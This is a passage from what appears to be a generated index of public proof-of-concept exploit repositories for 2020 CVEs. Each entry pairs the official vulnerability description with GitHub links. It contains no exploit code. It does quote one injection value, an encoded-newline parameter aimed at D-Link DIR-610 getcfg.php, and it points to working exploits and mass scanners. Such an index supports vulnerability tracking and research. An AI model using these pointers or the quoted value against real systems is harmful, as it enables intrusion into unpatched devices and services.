- [dpredrag/CVE-2020-8840](https://github.com/dpredrag/CVE-2020-8840)
### CVE-2020-8888
- [SnipJoe/CVE-2020-8888](https://github.com/SnipJoe/CVE-2020-8888)
### CVE-2020-8950 (2020-02-12)
The AUEPLauncher service in Radeon AMD User Experience Program Launcher through 1.0.0.1 on Windows allows elevation of privilege by placing a crafted file in %PROGRAMDATA%\AMD\PPC\upload and then creating a symbolic link in %PROGRAMDATA%\AMD\PPC\temp that points to an arbitrary folder with an arbitrary file name.
- [sailay1996/amd_eop_poc](https://github.com/sailay1996/amd_eop_poc)
### CVE-2020-8958 (2020-07-15)
Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field.
- [qurbat/CVE-2020-8958](https://github.com/qurbat/CVE-2020-8958)
- [Asjidkalam/CVE-2020-8958](https://github.com/Asjidkalam/CVE-2020-8958)
### CVE-2020-9006 (2020-02-17)
The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection (in the sgImportPopups function in sg_popup_ajax.php) via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on Wordpress instances. (This issue has been fixed in the 3.x branch of popup-builder.)
- [s3rgeym/cve-2020-9006](https://github.com/s3rgeym/cve-2020-9006)
### CVE-2020-9008 (2020-02-25)
Stored Cross-site scripting (XSS) vulnerability in Blackboard Learn/PeopleTool v9.1 allows users to inject arbitrary web script via the Tile widget in the People Tool profile editor.
- [kyletimmermans/blackboard-xss](https://github.com/kyletimmermans/blackboard-xss)
### CVE-2020-9038 (2020-02-17)
Joplin through 1.0.184 allows Arbitrary File Read via XSS.
- [JavierOlmedo/CVE-2020-9038](https://github.com/JavierOlmedo/CVE-2020-9038)
### CVE-2020-9047 (2020-06-26)
A vulnerability exists that could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentially download and run a malicious executable that could allow OS command injection on the system.
- [norrismw/CVE-2020-9047](https://github.com/norrismw/CVE-2020-9047)
### CVE-2020-9054 (2020-03-04)
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
- [darrenmartyn/CVE-2020-9054](https://github.com/darrenmartyn/CVE-2020-9054)
### CVE-2020-9273 (2020-02-20)
In ProFTPD 1.3.7, it is possible to corrupt the memory pool by interrupting the data transfer channel. This triggers a use-after-free in alloc_pool in pool.c, and possible remote code execution.
- [ptef/CVE-2020-9273](https://github.com/ptef/CVE-2020-9273)
### CVE-2020-9283 (2020-02-20)
golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.
- [brompwnie/CVE-2020-9283](https://github.com/brompwnie/CVE-2020-9283)
### CVE-2020-9289 (2020-06-16)
Use of a hard-coded cryptographic key to encrypt password data in CLI configuration in FortiManager 6.2.3 and below, FortiAnalyzer 6.2.3 and below may allow an attacker with access to the CLI configuration or the CLI backup file to decrypt the sensitive data, via knowledge of the hard-coded key.
- [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289)
### CVE-2020-9332 (2020-06-17)
ftusbbus2.sys in FabulaTech USB for Remote Desktop through 2020-02-19 allows privilege escalation via crafted IoCtl code related to a USB HID device.
- [Sentinel-One/CVE-2020-9332](https://github.com/Sentinel-One/CVE-2020-9332)
### CVE-2020-9375 (2020-03-25)
TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field.
- [thewhiteh4t/cve-2020-9375](https://github.com/thewhiteh4t/cve-2020-9375)
### CVE-2020-9376 (2020-07-09)
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
- [renatoalencar/dlink-dir610-exploits](https://github.com/renatoalencar/dlink-dir610-exploits)
### CVE-2020-9380 (2020-03-05)
IPTV Smarters WEB TV PLAYER through 2020-02-22 allows attackers to execute OS commands by uploading a script.
- [migueltarga/CVE-2020-9380](https://github.com/migueltarga/CVE-2020-9380)
### CVE-2020-9442 (2020-02-28)
OpenVPN Connect 3.1.0.361 on Windows has Insecure Permissions for %PROGRAMDATA%\OpenVPN Connect\drivers\tap\amd64\win10, which allows local users to gain privileges by copying a malicious drvstore.dll there.
- [hessandrew/CVE-2020-9442](https://github.com/hessandrew/CVE-2020-9442)
### CVE-2020-9460 (2020-04-14)
Octech Oempro 4.7 through 4.11 allow XSS by an authenticated user. The parameter CampaignName in Campaign.Create is vulnerable.
- [g-rubert/CVE-2020-9460](https://github.com/g-rubert/CVE-2020-9460)
### CVE-2020-9461 (2020-04-14)
Octech Oempro 4.7 through 4.11 allow stored XSS by an authenticated user. The FolderName parameter of the Media.CreateFolder command is vulnerable.
- [g-rubert/CVE-2020-9461](https://github.com/g-rubert/CVE-2020-9461)
### CVE-2020-9470 (2020-03-07)
An issue was discovered in Wing FTP Server 6.2.5 before February 2020. Due to insecure permissions when handling session cookies, a local user may view the contents of the session and session_admin directories, which expose active session cookies within the Wing FTP HTTP interface and administration panel. These cookies may be used to hijack user and administrative sessions, including the ability to execute Lua commands as root within the administration panel.
- [Al1ex/CVE-2020-9470](https://github.com/Al1ex/CVE-2020-9470)
### CVE-2020-9472 (2020-03-16)
Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.
- [john-dooe/CVE-2020-9472](https://github.com/john-dooe/CVE-2020-9472)
### CVE-2020-9480 (2020-06-23)
In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).
- [XiaoShaYu617/CVE-2020-9480](https://github.com/XiaoShaYu617/CVE-2020-9480)
### CVE-2020-9483 (2020-06-30)
**Resolved** When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
- [shanika04/apache_skywalking](https://github.com/shanika04/apache_skywalking)
- [Neko-chanQwQ/CVE-2020-9483](https://github.com/Neko-chanQwQ/CVE-2020-9483)
### CVE-2020-9484 (2020-05-20)
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
- [threedr3am/tomcat-cluster-session-sync-exp](https://github.com/threedr3am/tomcat-cluster-session-sync-exp)
- [masahiro331/CVE-2020-9484](https://github.com/masahiro331/CVE-2020-9484)
- [seanachao/CVE-2020-9484](https://github.com/seanachao/CVE-2020-9484)
- [IdealDreamLast/CVE-2020-9484](https://github.com/IdealDreamLast/CVE-2020-9484)
- [qerogram/CVE-2020-9484](https://github.com/qerogram/CVE-2020-9484)
- [osamahamad/CVE-2020-9484-Mass-Scan](https://github.com/osamahamad/CVE-2020-9484-Mass-Scan)
- [anjai94/CVE-2020-9484-exploit](https://github.com/anjai94/CVE-2020-9484-exploit)
- [PenTestical/CVE-2020-9484](https://github.com/PenTestical/CVE-2020-9484)
- [DanQMoo/CVE-2020-9484-Scanner](https://github.com/DanQMoo/CVE-2020-9484-Scanner)
- [AssassinUKG/CVE-2020-9484](https://github.com/AssassinUKG/CVE-2020-9484)
- [VICXOR/CVE-2020-9484](https://github.com/VICXOR/CVE-2020-9484)
- [DXY0411/CVE-2020-9484](https://github.com/DXY0411/CVE-2020-9484)
- [RepublicR0K/CVE-2020-9484](https://github.com/RepublicR0K/CVE-2020-9484)
- [ColdFusionX/CVE-2020-9484](https://github.com/ColdFusionX/CVE-2020-9484)
- [d3fudd/CVE-2020-9484_Exploit](https://github.com/d3fudd/CVE-2020-9484_Exploit)
- [0dayCTF/CVE-2020-9484](https://github.com/0dayCTF/CVE-2020-9484)
- [Disturbante/CVE-2020-9484](https://github.com/Disturbante/CVE-2020-9484)
- [savsch/PoC_CVE-2020-9484](https://github.com/savsch/PoC_CVE-2020-9484)
### CVE-2020-9495 (2020-06-19)
Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. A attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects.
- [ggolawski/CVE-2020-9495](https://github.com/ggolawski/CVE-2020-9495)
### CVE-2020-9496 (2020-07-15)
XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
- [dwisiswant0/CVE-2020-9496](https://github.com/dwisiswant0/CVE-2020-9496)
- [Vulnmachines/apache-ofbiz-CVE-2020-9496](https://github.com/Vulnmachines/apache-ofbiz-CVE-2020-9496)
- [g33xter/CVE-2020-9496](https://github.com/g33xter/CVE-2020-9496)
- [cyber-niz/CVE-2020-9496](https://github.com/cyber-niz/CVE-2020-9496)
- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc)
- [ambalabanov/CVE-2020-9496](https://github.com/ambalabanov/CVE-2020-9496)
- [s4dbrd/CVE-2020-9496](https://github.com/s4dbrd/CVE-2020-9496)
- [Ly0nt4r/CVE-2020-9496](https://github.com/Ly0nt4r/CVE-2020-9496)
### CVE-2020-9547 (2020-03-02)
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
- [fairyming/CVE-2020-9547](https://github.com/fairyming/CVE-2020-9547)
### CVE-2020-9548 (2020-03-02)
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
- [fairyming/CVE-2020-9548](https://github.com/fairyming/CVE-2020-9548)
### CVE-2020-9715 (2020-08-19)
Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution .
- [lsw29475/CVE-2020-9715](https://github.com/lsw29475/CVE-2020-9715)
- [wonjunchun/CVE-2020-9715](https://github.com/wonjunchun/CVE-2020-9715)
### CVE-2020-9758 (2020-03-09)
An issue was discovered in chat.php in LiveZilla Live Chat 8.0.1.3 (Helpdesk). A blind JavaScript injection lies in the name parameter. Triggering this can fetch the username and passwords of the helpdesk employees in the URI. This leads to a privilege escalation, from unauthenticated to user-level access, leading to full account takeover. The attack fetches multiple credentials because they are stored in the database (stored XSS). This affects the mobile/chat URI via the lgn and psswrd parameters.
- [ari034/CVE-2020-9758](https://github.com/ari034/CVE-2020-9758)
### CVE-2020-9767 (2020-08-14)
A vulnerability related to Dynamic-link Library (“DLL”) loading in the Zoom Sharing Service would allow an attacker who had local access to a machine on which the service was running with elevated privileges to elevate their system privileges as well through use of a malicious DLL. Zoom addressed this issue, which only applies to Windows users, in the 5.0.4 client release.
- [shubham0d/Zoom-dll-hijacking](https://github.com/shubham0d/Zoom-dll-hijacking)
### CVE-2020-9802 (2020-06-09)
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.
- [khcujw/CVE-2020-9802](https://github.com/khcujw/CVE-2020-9802)
### CVE-2020-9922 (2020-12-08)
A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. Processing a maliciously crafted email may lead to writing arbitrary files.
- [Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922](https://github.com/Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922)
### CVE-2020-9934 (2020-10-16)
An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information.
- [mattshockl/CVE-2020-9934](https://github.com/mattshockl/CVE-2020-9934)
### CVE-2020-9992 (2020-10-16)
This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.
- [c0ntextomy/c0ntextomy](https://github.com/c0ntextomy/c0ntextomy)
### CVE-2020-10128 (2023-09-05)
SearchBlox product with version before 9.2.1 is vulnerable to stored cross-site scripting at multiple user input parameters. In SearchBlox products multiple parameters are not sanitized/validate properly which allows an attacker to inject malicious JavaScript.
- [InfoSec4Fun/CVE-2020-10128](https://github.com/InfoSec4Fun/CVE-2020-10128)
### CVE-2020-10129 (2023-09-06)
SearchBlox before Version 9.2.1 is vulnerable to Privileged Escalation-Lower user is able to access Admin functionality.
- [InfoSec4Fun/CVE-2020-10129](https://github.com/InfoSec4Fun/CVE-2020-10129)
### CVE-2020-10130 (2023-09-06)
SearchBlox before Version 9.1 is vulnerable to business logic bypass where the user is able to create multiple super admin users in the system.
- [InfoSec4Fun/CVE-2020-10130](https://github.com/InfoSec4Fun/CVE-2020-10130)
### CVE-2020-10131 (2023-09-06)
SearchBlox before Version 9.2.1 is vulnerable to CSV macro injection in "Featured Results" parameter.
- [InfoSec4Fun/CVE-2020-10131](https://github.com/InfoSec4Fun/CVE-2020-10131)
### CVE-2020-10132 (2023-09-06)
SearchBlox before Version 9.1 is vulnerable to cross-origin resource sharing misconfiguration.
- [InfoSec4Fun/CVE-2020-10132](https://github.com/InfoSec4Fun/CVE-2020-10132)
### CVE-2020-10135 (2020-05-19)
Legacy pairing and secure-connections pairing authentication in Bluetooth BR/EDR Core Specification v5.2 and earlier may allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. An unauthenticated, adjacent attacker could impersonate a Bluetooth BR/EDR master or slave to pair with a previously paired remote device to successfully complete the authentication procedure without knowing the link key.
- [m4rm0k/CVE-2020-10135-BIAS](https://github.com/m4rm0k/CVE-2020-10135-BIAS)
### CVE-2020-10148 (2020-12-29)
The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.
- [rdoix/CVE-2020-10148-Solarwinds-Orion](https://github.com/rdoix/CVE-2020-10148-Solarwinds-Orion)
- [B1anda0/CVE-2020-10148](https://github.com/B1anda0/CVE-2020-10148)
### CVE-2020-10189 (2020-03-06)
Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.
- [zavke/CVE-2020-10189-ManageEngine](https://github.com/zavke/CVE-2020-10189-ManageEngine)
### CVE-2020-10199 (2020-04-01)
Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
- [wsfengfan/CVE-2020-10199-10204](https://github.com/wsfengfan/CVE-2020-10199-10204)
- [jas502n/CVE-2020-10199](https://github.com/jas502n/CVE-2020-10199)
- [magicming200/CVE-2020-10199_CVE-2020-10204](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204)
- [zhzyker/CVE-2020-10199_POC-EXP](https://github.com/zhzyker/CVE-2020-10199_POC-EXP)
- [aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199)
- [hugosg97/CVE-2020-10199-Nexus-3.21.01](https://github.com/hugosg97/CVE-2020-10199-Nexus-3.21.01)
### CVE-2020-10204 (2020-04-01)
Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution.
- [zhzyker/CVE-2020-10204](https://github.com/zhzyker/CVE-2020-10204)
### CVE-2020-10238 (2020-03-16)
An issue was discovered in Joomla! before 3.9.16. Various actions in com_templates lack the required ACL checks, leading to various potential attack vectors.
- [HoangKien1020/CVE-2020-10238](https://github.com/HoangKien1020/CVE-2020-10238)
### CVE-2020-10239 (2020-03-16)
An issue was discovered in Joomla! before 3.9.16. Incorrect Access Control in the SQL fieldtype of com_fields allows access for non-superadmin users.
- [HoangKien1020/CVE-2020-10239](https://github.com/HoangKien1020/CVE-2020-10239)
### CVE-2020-10551 (2020-04-09)
QQBrowser before 10.5.3870.400 installs a Windows service TsService.exe. This file is writable by anyone belonging to the NT AUTHORITY\Authenticated Users group, which includes all local and remote users. This can be abused by local attackers to escalate privileges to NT AUTHORITY\SYSTEM by writing a malicious executable to the location of TsService.
- [seqred-s-a/CVE-2020-10551](https://github.com/seqred-s-a/CVE-2020-10551)
### CVE-2020-10558 (2020-03-20)
The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other miscellaneous functions from the main screen.
- [nullze/CVE-2020-10558](https://github.com/nullze/CVE-2020-10558)
- [AmazingOut/Tesla-CVE-2020-10558](https://github.com/AmazingOut/Tesla-CVE-2020-10558)
### CVE-2020-10560 (2020-03-30)
An issue was discovered in Open Source Social Network (OSSN) through 5.3. A user-controlled file path with a weak cryptographic rand() can be used to read any file with the permissions of the webserver. This can lead to further compromise. The attacker must conduct a brute-force attack against the SiteKey to insert into a crafted URL for components/OssnComments/ossn_com.php and/or libraries/ossn.lib.upgrade.php.
- [alex-seymour/CVE-2020-10560-Key-Recovery](https://github.com/alex-seymour/CVE-2020-10560-Key-Recovery)
- [kevthehermit/CVE-2020-10560](https://github.com/kevthehermit/CVE-2020-10560)
### CVE-2020-10596 (2020-03-17)
OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.
- [miguelc49/CVE-2020-10596-2](https://github.com/miguelc49/CVE-2020-10596-2)
- [miguelc49/CVE-2020-10596-1](https://github.com/miguelc49/CVE-2020-10596-1)
### CVE-2020-10663 (2020-04-28)
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
- [rails-lts/json_cve_2020_10663](https://github.com/rails-lts/json_cve_2020_10663)
### CVE-2020-10665 (2020-03-18)
Docker Desktop allows local privilege escalation to NT AUTHORITY\SYSTEM because it mishandles the collection of diagnostics with Administrator privileges, leading to arbitrary DACL permissions overwrites and arbitrary file writes. This affects Docker Desktop Enterprise before 2.1.0.9, Docker Desktop for Windows Stable before 2.2.0.4, and Docker Desktop for Windows Edge before 2.2.2.0.
- [spaceraccoon/CVE-2020-10665](https://github.com/spaceraccoon/CVE-2020-10665)
### CVE-2020-10673 (2020-03-18)
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).
- [harry1080/CVE-2020-10673](https://github.com/harry1080/CVE-2020-10673)
- [Al1ex/CVE-2020-10673](https://github.com/Al1ex/CVE-2020-10673)
### CVE-2020-10713 (2020-07-30)
A flaw was found in grub2, prior to version 2.06. An attacker may use the GRUB 2 flaw to hijack and tamper the GRUB verification process. This flaw also allows the bypass of Secure Boot protections. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system such as gaining physical access, obtain the ability to alter a pxe-boot network, or have remote access to a networked system with root access. With this access, an attacker could then craft a string to cause a buffer overflow by injecting a malicious payload that leads to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- [eclypsium/BootHole](https://github.com/eclypsium/BootHole)
### CVE-2020-10749 (2020-06-03)
A vulnerability was found in all versions of containernetworking/plugins before version 0.8.6, that allows malicious containers in Kubernetes clusters to perform man-in-the-middle (MitM) attacks. A malicious container can exploit this flaw by sending rogue IPv6 router advertisements to the host or other containers, to redirect traffic to the malicious container.
- [knqyf263/CVE-2020-10749](https://github.com/knqyf263/CVE-2020-10749)
### CVE-2020-10757 (2020-06-09)
A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.
- [ShaikUsaf/linux-4.19.72_CVE-2020-10757](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-10757)
### CVE-2020-10759 (2020-09-15)
A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity.
- [justinsteven/CVE-2020-10759-poc](https://github.com/justinsteven/CVE-2020-10759-poc)
### CVE-2020-10770 (2020-12-15)
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
- [ColdFusionX/Keycloak-12.0.1-CVE-2020-10770](https://github.com/ColdFusionX/Keycloak-12.0.1-CVE-2020-10770)
### CVE-2020-10882 (2020-03-25)
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tdpServer service, which listens on UDP port 20002 by default. When parsing the slave_mac parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-9650.
- [lnversed/CVE-2020-10882](https://github.com/lnversed/CVE-2020-10882)
### CVE-2020-10915 (2020-04-22)
This vulnerability allows remote attackers to execute arbitrary code on affected installations of VEEAM One Agent 9.5.4.4587. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HandshakeResult method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-10401.
- [Cinnamon1212/Modified-CVE-2020-10915-MsfModule](https://github.com/Cinnamon1212/Modified-CVE-2020-10915-MsfModule)
### CVE-2020-10963 (2020-03-25)
FrozenNode Laravel-Administrator through 5.0.12 allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension. NOTE: this product is discontinued.
- [scopion/CVE-2020-10963](https://github.com/scopion/CVE-2020-10963)
### CVE-2020-10977 (2020-04-08)
GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects.
- [KooroshRZ/CVE-2020-10977](https://github.com/KooroshRZ/CVE-2020-10977)
- [thewhiteh4t/cve-2020-10977](https://github.com/thewhiteh4t/cve-2020-10977)
- [JustMichi/CVE-2020-10977.py](https://github.com/JustMichi/CVE-2020-10977.py)
- [erk3/gitlab-12.9.0-file-read](https://github.com/erk3/gitlab-12.9.0-file-read)
- [possib1e/cve-2020-10977](https://github.com/possib1e/cve-2020-10977)
- [liath/CVE-2020-10977](https://github.com/liath/CVE-2020-10977)
- [lisp3r/cve-2020-10977-read-and-execute](https://github.com/lisp3r/cve-2020-10977-read-and-execute)
- [vandycknick/gitlab-cve-2020-10977](https://github.com/vandycknick/gitlab-cve-2020-10977)
### CVE-2020-11019 (2020-05-29)
In FreeRDP less than or equal to 2.0.0, when running with logger set to "WLOG_TRACE", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0.
- [Lixterclarixe/CVE-2020-11019](https://github.com/Lixterclarixe/CVE-2020-11019)
### CVE-2020-11022 (2020-04-29)
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
- [0xAJ2K/CVE-2020-11022-CVE-2020-11023](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023)
- [Snorlyd/https-nj.gov---CVE-2020-11022](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022)
### CVE-2020-11023 (2020-04-29)
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
- [Snorlyd/https-nj.gov---CVE-2020-11023](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11023)
- [Cybernegro/CVE-2020-11023](https://github.com/Cybernegro/CVE-2020-11023)
- [andreassundstrom/cve-2020-11023-demonstration](https://github.com/andreassundstrom/cve-2020-11023-demonstration)
### CVE-2020-11060 (2020-05-12)
In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.
- [0xdreadnaught/cve-2020-11060-poc](https://github.com/0xdreadnaught/cve-2020-11060-poc)
### CVE-2020-11076 (2020-05-22)
In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
- [dentarg/cougar](https://github.com/dentarg/cougar)
### CVE-2020-11107 (2020-04-02)
An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16 , and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution.
- [S1lkys/CVE-2020-11107](https://github.com/S1lkys/CVE-2020-11107)
- [andripwn/CVE-2020-11107](https://github.com/andripwn/CVE-2020-11107)
### CVE-2020-11108 (2020-05-11)
The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.
- [Frichetten/CVE-2020-11108-PoC](https://github.com/Frichetten/CVE-2020-11108-PoC)
### CVE-2020-11110 (2020-07-27)
Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
- [AVE-Stoik/CVE-2020-11110-Proof-of-Concept](https://github.com/AVE-Stoik/CVE-2020-11110-Proof-of-Concept)
### CVE-2020-11113 (2020-03-31)
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).
- [Al1ex/CVE-2020-11113](https://github.com/Al1ex/CVE-2020-11113)
### CVE-2020-11179 (2021-01-21)
Arbitrary read and write to kernel addresses by temporarily overwriting ring buffer pointer and creating a race condition. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
